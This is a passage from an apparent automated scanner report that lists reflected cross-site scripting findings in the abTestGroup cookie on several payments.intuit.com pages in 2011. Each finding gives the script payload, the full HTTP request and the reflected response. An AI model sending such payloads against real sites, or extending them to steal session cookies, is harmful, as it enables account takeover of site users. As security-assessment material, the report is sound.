       A/B Test Group: T16d7ba9<script>alert(1)</script>df514fb9a00<br />
...[SNIP]...

1.91. http://payments.intuit.com/products/echecks-and-check-processing.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/echecks-and-check-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfe97"><script>alert(1)</script>b605d5bc92b was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/echecks-and-check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16bfe97"><script>alert(1)</script>b605d5bc92b;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:37 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=-wYBl8vzIr2xsu7UV+rclQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:38 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9601C8F0A0805192AA117E375BEDB29
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145475

...[SNIP]...
<input id="testGroup" value="T16bfe97"><script>alert(1)</script>b605d5bc92b" type="hidden" />
...[SNIP]...

1.92. http://payments.intuit.com/products/echecks-and-check-processing.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/echecks-and-check-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload e3cdf<script>alert(1)</script>457e3b04e25 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/echecks-and-check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16e3cdf<script>alert(1)</script>457e3b04e25;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:56 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=HXfFyAOh1s4XIQ1r8jFuSw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:57 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9614F610A0805192AA117E3C413B840
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145461

...[SNIP]...
<br />
       A/B Test Group: T16e3cdf<script>alert(1)</script>457e3b04e25<br />
...[SNIP]...

1.93. http://payments.intuit.com/products/internet-merchant-accounts.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/internet-merchant-accounts.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 94dbf<script>alert(1)</script>468c7862810 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/internet-merchant-accounts.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1694dbf<script>alert(1)</script>468c7862810;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:40 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=pPmRhbq2vNWdPqB79vHiqw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:41 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F3CC20A0805192AA117E3B7B31296
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116390

...[SNIP]...
<br />
       A/B Test Group: T1694dbf<script>alert(1)</script>468c7862810<br />
...[SNIP]...

1.94. http://payments.intuit.com/products/internet-merchant-accounts.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/internet-merchant-accounts.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a32b2"><script>alert(1)</script>eca551a06e2 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/internet-merchant-accounts.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16a32b2"><script>alert(1)</script>eca551a06e2;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:49 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=tkQDatAtu3SKEK4O6mqLXQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:50 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95D89780A0805192AA117E36458950A
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116404

...[SNIP]...
<input id="testGroup" value="T16a32b2"><script>alert(1)</script>eca551a06e2" type="hidden" />
...[SNIP]...

1.95. http://payments.intuit.com/products/online-credit-card-processing.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/online-credit-card-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e40f2"><script>alert(1)</script>2ecf5ecc899 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16e40f2"><script>alert(1)</script>2ecf5ecc899;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:27 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=Pbm4EsFX7ItyQ6uhSFsQPg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:28 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F07690A0805192AA117E39E651AF3
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116192

...[SNIP]...
<input id="testGroup" value="T16e40f2"><script>alert(1)</script>2ecf5ecc899" type="hidden" />
...[SNIP]...

1.96. http://payments.intuit.com/products/online-credit-card-processing.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/online-credit-card-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload ff5ed<script>alert(1)</script>1c8e4d0787a was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16ff5ed<script>alert(1)</script>1c8e4d0787a;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:21 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=dCkX6oL--hpQ36+ZvLN4zA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:22 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960C52D0A0805192AA117E344932928
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116179

...[SNIP]...
<br />
       A/B Test Group: T16ff5ed<script>alert(1)</script>1c8e4d0787a<br />
...[SNIP]...

1.97. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-credit-card-processing-services.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 6fb36<script>alert(1)</script>4c918b363ab was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-credit-card-processing-services.jsp?scid=ips_pc90_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T166fb36<script>alert(1)</script>4c918b363ab;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:41 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=5+RKX6vGqEPDQ0N1aaWgzA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:42 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96117780A0805192AA117E3CB6FBF98
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140388

...[SNIP]...
<br />
       A/B Test Group: T166fb36<script>alert(1)</script>4c918b363ab<br />
...[SNIP]...

1.98. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-credit-card-processing-services.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66866"><script>alert(1)</script>32afa1f3f6c was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-credit-card-processing-services.jsp?scid=ips_pc90_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
